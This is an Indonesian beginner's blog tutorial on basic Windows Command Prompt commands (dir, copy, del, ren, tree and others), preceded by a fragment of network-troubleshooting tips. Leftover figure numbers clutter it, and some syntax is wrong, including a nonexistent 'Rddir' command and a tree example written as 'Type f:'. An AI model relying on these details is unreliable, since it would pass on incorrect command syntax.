jika tidak jalan cek setting ip di client, cek konfigurasi kabel
jika client langsung ke router pake kabel UTP konfigurasi cross kalo melalui hub dulu pake konfigurasi straight
jika reply
ping ke gateway ISP
jika tidak jalan cek kabel UTP , cek kinfigurasi mikrotik, apakah sesuai dengan konfigurasi yang diberikan ISP atau tidak
untuk cek
IP address --> ip address print

07 April 2010

Perintah Dasar Command Prompt


Perintah Dasar Command Prompt

Langsung aja kalian buka command prompt kalian…
  • Pilih Start > Run… > pada jendela Run… ketikkan cmd.
    Gambar 1 : Kotak dialog Runimage
  • Kemudian tekan [Enter].
Nah sekarang kita akan mengenal beberapa perintah dasar CMD
PERINTAH PERINTAH PADA COMMAND PROMPT

  • Date
Perintah Date berfungsi untuk menampilkan tanggal atau untuk menset tanggal.1
  • Vol [drive]
Berfungsi untuk menampilkan label suatu drive dan serial numbernya.2
  • Time [/T]
Time tanpa parameter /T akan menampilan waktu saat ini dan menset dengan yang baru. Time dengan parameter /T akan menampilan waktu.3
  • Title[string]
Berfungsi untuk mengganti nama pada window title dengan yang baru.4
  • Ver
Berfungsi untuk menampilan versi dari windows yang dipakai.5
  • Cls
Berfungsi untuk membersihkan layar.
  • Color [attr]
Berfungsi untuk mengubah warna dari background dan foreground pada command
prompt.
Attr : adalah parameter untuk warnanya.
Attr terdiri dari 2 nilai hexadecimal, nilai pertama untuk menentukan warna
background dan nilai kedua untuk menentukan warna pada foreground.
Daftar warnanya sebagai berikut :
0 = Hitam
1 = Biru
2 = Hijau
3 = Aqua
4 = Merah
5 = Unggu
6 = Kuning
7 = Putih
8 = Abu-abu
9 = Light Blue
A = Light Green
B = Light Aqua
C = Light Red
D = Light Purple
E = Light Yellow
F = Bright White
Contoh :
6 7 8 9
Jika digabungkan :
10 11

PERINTAH-PERINTAH UNTUK MANAGEMENT FILE
Dibawah ini merupakan perintah-perintah untuk management file, seperti
untuk membuat folder, mengcopy folder atau file, mengganti nama dan sebagainya.
  • Md
Berfungsi untuk membuat direktori
Contoh
Md \komputer
Akan membuat folder bernama computer didalam root folder.
Md \komputer\blog
Akan membuat folder bernama computer dan didalam folder computer akan dibuat folder bernama blog
12
  • Cd
Berfungsi untuk berpindah dari satu direktori ke direktori lain.
Contoh f:/cd komputerblog
image
perintah diatas akan berpindah dari drive f ke folder komputerblog
Bagaimana kalau mau berpindah drive ? pada command prompt ketikkan drive yang
mau dituju.image
  • dir [drive:][path][filename] [/A[[:]attributes]] [/B] [/C] [/D] [/L] [/O[[:]sortorder]]
    [/P] [/Q] [/S] [/T[[:]timefield]] [/W] [/X] [/4]
Berfungsi untuk menampilkan file dan subdirektori yang terdapat dalam direktori.
Perintah dir memiliki beberapa attribute, penjelasannya sebagai berikut :
/A : berfungsi untuk menampilkan file yang memiliki attribute direktori, file
tersembunyi, file system, read only file dan archiving file. Singkatnya dengan
menambahkan atribut ini maka semua file yang ada dalam direktori akan ditampilkan.
13
/B : hanya menampilkan nama file saja.
14
/D : menampilkan file secara horizontal 
15
/L : menampilkan nama file secara lowercase
16
/N : menampilkan file dengan nama format panjang, tanpa /N nama folder
“Program files” menjadi “progra~1”.17
/O[attr] : menampilkan file sesuai urutan.
-N : Urut file sesuai nama (alphabetic)
-E : Urut file sesuai extension (alphabetic)
-G : Urut file sesuai group
-S : Urut file sesuai ukuran file (dimulai dari terkecil)
-D : Urut file sesuai waktu (dimulai dari yang paling lama)19
/P : Mempause ketika layer command prompt sudah penuh.
/Q : Menampilkan nama pemilik dari file.
18
/S : Menampilkan folder beserta subdirectori dan file yang terdapat didalamnya.
/W : Menampilkan file secara horizontal

  • Copy [/source] [destination]
Berfungsi untuk menyalin file dari lokasi satu ke lokasi lain.
Contoh :
Copy c:/laporan.doc f:
Perintah ini akan menyalin file laporan.doc yang berada pada drive c ke drive f.
Copy c:/*.doc f:
Perintah ini akan menyalin semua file yang berextensi *.doc ke drive f.
  • Del [file]
Berfungsi untuk menghapus file.
Contoh :
Del c:/buku.txt
Perintah ini akan menghapus file buku.txt dalam drive c.
Del c:/*.txt
Perintah ini akan menghapus semua file yang berextensi *.txt dalam drive c.
  • Erase [file]
Sama seperti perintah del, berfungsi untuk menghapus file.
Contoh :
erase c:/buku.txt
Perintah ini akan menghapus file buku.txt dalam drive c.
erase c:/*.txt
Perintah ini akan menghapus semua file yang berextensi *.txt dalam drive c.
  • Rd [folder]
Perintah ini berfungsi untuk menghapus suatu direktori.
Contoh
Rd games
Perintah ini akan menghapus folder yang bernama games.
  • Rddir [folder]
Sama seperti perintah rd, yaitu untuk menghapus direktori.
Contoh
Rddir game_lama
Perintah ini akan menghapus folder yang bernama game_lama

  • Ren [namafile] [namabaru]
Berfungsi untuk mengganti nama suatu file.
Contoh :
Ren kinta.doc kuliah.doc
Perintah ini akan mengganti nama kinta.doc dengan kuliah.doc

  • Rename [namafile] [namabaru]
Sama seperti ren, berfungsi untuk mengganti nama suatu file.
Contoh :
Rename kinta.doc kuliah.doc
Perintah ini akan mengganti nama kinta.doc dengan kuliah.doc
  • TYPE [drive:][path]filename
Berfungsi untuk menampilkan file berfomat text (*.txt) atau file lainnya yang
didukung oleh dos.
Contoh :
Type tentangku.txt
Perintah ini akan menampilkan file tentangku.txtimage

LAEN-LAEN
  • TREE [drive:][path] [/F] [/A]
/F : Dengan menambahkan option ini, maka file-file yang berada dalam folder
akan ditampilkan.
/A : Menggunakan format ASCII dalam menampilkan karakter.
Contoh:
Type f:
Perintah ini menampilkan susunan direktori yang berada pada drive f.image
Tree f: /f
Perintah ini menampikan folder beserta file yang berada pada drive f.image
  • Edit
Text editor untuk dos.image


Tambahan :
  • ATTRIB Perintah eksternal. Untuk melihat/mengubah atribut file
  • CLS Perintah internal. Untuk menghapus layar monitor
  • COPY Perintah internal. Untuk mengkopi file
  • DEL Perintah internal. Untuk menghapus file
  • DIR Perintah internal. Untuk melihat daftar file/folder di folder/direktori tertentu
  • MD Perintah internal. Untuk membuat direktori/folder baru
  • RD Perintah internal. Untuk menghapus folder (folder kosong)
  • REN Perintah internal. Untuk mengubah nama file/folder
  • TYPE Perintah internal. Untuk melihat isi fileEDIT Perintah eksternal. Untuk mengedit file teks (interaktif)
  • FDISK Perintah eksternal. Untuk melihat/mengubah/membuat partisi harddisk
  • FORMAT Perintah eksternal. Untuk memformat disket/harddisk
  • MORE Untuk mencegah tampilan menggulung terus-menerus
  • SYS Eksternal apa internal ya? Yang jelas untuk membuat disket/harddisk jadi bootable DEBUG Perintah eksternal. Untuk melihat/mengubah isi file dalam format heksadesimal
  • REG Perintah eksternal. Untuk melihat/mengubah/menghapus key/value registry
  • TASKKILL Perintah eksternal. Untuk menghentikan/membunuh proses yang sedang berlangsung
  • TASKLIST Perintah eksternal. Untuk melihat daftar proses yang sedang berlangsung
PERINTAH-PERINTAH BATCH
  • MELIHAT DAFTAR FILE: “DIR”
Perintah “DIR” berfungsi untuk melihat daftar file/folder yang berada di direktori atau folder tertentu. Sebenarnya perintah DIR mempunyai banyak sekali parameter perintah yang dapat kita gunakan untuk membatasi daftar file/folder yang kita inginkan. Di antaranya, parameter-parameter ini dapat kita gunakan untuk menentukan file, folder atau file dan folder yang ingin kita lihat di direktori/folder tertentu, kemudian menentukan apakah kita akan menampilkan file-file yang hidden atau tidak, kemudian mengurutkan berdasarkan nama, tanggal, ukuran, dan sebagainya. Untuk mengetahui daftar parameter dan cara penggunaannya, ketikkan “DIR /?” kemudian tekan Enter.
  • Melihat daftar file/folder dalam direktori/folder tertentu

rep : kidzoom.wordpress.com